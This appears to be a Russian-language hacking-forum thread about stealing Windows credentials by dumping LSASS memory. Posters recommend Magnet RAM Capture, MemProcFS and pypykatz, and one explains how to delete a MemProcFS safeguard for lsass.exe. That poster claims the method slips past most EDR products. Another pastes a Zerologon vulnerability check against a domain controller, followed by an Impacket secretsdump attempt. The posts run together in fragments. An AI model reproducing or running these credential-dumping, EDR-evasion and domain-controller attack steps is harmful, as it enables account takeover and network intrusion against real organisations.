PPL, Core Isolation, Memory что то там оффнуть ему нужно и мимик самый новый пусть скачает
Берите magnet raw dump, pypykatz и memprocfs.
github.com
if(!strcmp(pProcess->szName, "lsass.exe")) {
ctx->fDisabledSecurity = TRUE;
}Нафига вообще эти танцы с лишними инструментами. Проще через диспетчер задач шмякнуть на процесс и сделать дамп заархивить перетащить себе и питоном с установленным модулем "pip install pypykatz" выполнить.Берите magnet raw dump, pypykatz и memprocfs.
magnet raw dump сделает полный дамп памяти, переливаете его к себе.
монтируете как диск используя memprocfs, ищите PID lsass.exe, берёте оттуда minidump.dmp
потом через pypykatz разбираете, мимик морально устарел и может не знать что делать с новым Windows.
оригинальная версия memprocfs не снимает lsass.exe, что бы обойти нужно изменить кое что в файле:
MemProcFS/vmm/modules/m_proc_minidump.c at ddaadf0aa86683fdb7dad20c76f619325065bea7 · ufrisk/MemProcFS
MemProcFS. Contribute to ufrisk/MemProcFS development by creating an account on GitHub.
Код:if(!strcmp(pProcess->szName, "lsass.exe")) { ctx->fDisabledSecurity = TRUE; }
Эти три строчки удалить нужно.
Мною предложенный вариант работает с 90% EDR решениями
Target : 192.168.0.1
Account: SRV01$
Type : 6 (Server)
Mode : detect
Trying to 'authenticate'...
===============================================================
NetrServerAuthenticate2: 0x00000000
* Authentication: OK -- vulnerablec:\secretsdump.py -no-pass -just-dc SRV01$@192.168.0.1
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentica
tion information.)
[*] Cleaning up...